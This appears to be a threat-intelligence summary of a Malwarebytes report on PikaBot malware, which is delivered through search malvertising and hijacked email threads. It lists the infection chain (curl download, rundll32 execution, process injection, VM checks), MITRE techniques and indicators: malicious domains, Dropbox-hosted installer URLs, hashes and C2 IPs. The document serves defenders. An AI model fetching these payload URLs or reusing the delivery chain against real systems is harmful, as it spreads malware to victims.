Threat Research

PikaBot distributed via malicious search ads | Malwarebytes

Securonix

Malvertising and search-engine-driven campaigns are increasingly used to drop PikaBot, a malware family linked to TA577, targeting businesses with decoy sites and signed installers. The operation uses layered evasion, including loader injections and VM checks, to evade detection and persist on infected hosts. Hashtags: #PikaBot #TA577 #FakeBat #QakBot #AnyDesk

Keypoints

  • PikaBot appeared in early 2023 and was distributed via malvertising, with strong ties to TA577 and prior payloads like QakBot.
  • The distribution chain often starts with an email (hijacked thread) containing a link to an external website, leading to a zip containing malicious JavaScript.
  • The JavaScript downloads the payload from an external site using curl and then executes it with rundll32 to run a DLL payload.
  • PikaBot’s core module is injected into the legitimate SearchProtocolHost.exe process, with stealthy, indirect syscalls to hide activity.
  • Malvertising infrastructure bypasses Google checks via tracking URLs and legitimate marketing platforms, with VM checks before redirecting to a decoy AnyDesk site.
  • Indicators include malicious domains, Dropbox-hosted MSI installers, PikaBot hashes, and a set of C2 IPs.

MITRE Techniques

  • [T1566.002] Phishing: Spearphishing Link – An email (hijacked thread) containing a link to an external website. Quote: ‘an email (hijacked thread) containing a link to an external website.’
  • [T1105] Ingress Tool Transfer – The JavaScript creates a random directory structure where it retrieves the malicious payload from an external website via the curl utility. Quote: ‘The JavaScript creates a random directory structure where it retrieves the malicious payload from an external website via the curl utility.’
  • [T1218.011] Signed Binary Proxy Execution: Rundll32 – The payload is executed via rundll32. Quote: ‘rundll32 C:GkooegsglitrgDkrogirbksriWkkfgujbsrbuj.dll,Enter’
  • [T1055] Process Injection – The core module is injected into the legitimate SearchProtocolHost.exe process. Quote: ‘PikaBot’s core module is then injected into the legitimate SearchProtocolHost.exe process.’
  • [T1497.001] Virtualization/Sandbox Evasion – JavaScript fingerprinting checks determine if the user is running a VM. Quote: ‘fingerprinting via JavaScript to determine, among other things, if the user is running a virtual machine.’
  • [T1189] Drive-by Compromise – Malvertising drives initial access by leveraging ads to deliver the payload. Quote: ‘During this past year, we have seen an increase in the use of malicious ads (malvertising) and specifically those via search engines, to drop malware targeting businesses.’

Indicators of Compromise

  • [Domain] Malicious domains – anadesky.ovmv.net, cxtensones.top
  • [URL] Dropbox payloads – dropbox.com/scl/fi/3o9baztz08bdw6yts8sft/Installer.msi?dl=1&rlkey=wpbj6u5u6tja92y1t157z4cpq, dropbox.com/scl/fi/p8iup71lu1tiwsyxr909l/Installer.msi?dl=1&rlkey=h07ehkq617rxphb3asmd91xtu
  • [Hash] PikaBot hashes – 0e81a36141d196401c46f6ce293a370e8f21c5e074db5442ff2ba6f223c435f5, da81259f341b83842bf52325a22db28af0bc752e703a93f1027fa8d38d3495ff
  • [Hash] PikaBot hashes – 69281eea10f5bfcfd8bc0481f0da9e648d1bd4d519fe57da82f2a9a452d60320
  • [IP] PikaBot C2s – 172.232.186.251, 57.128.83.129, 57.128.164.11, 57.128.108.132, 139.99.222.29

Read more: https://www.malwarebytes.com/blog/threat-intelligence/2023/12/pikabot-distributed-via-malicious-ads

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint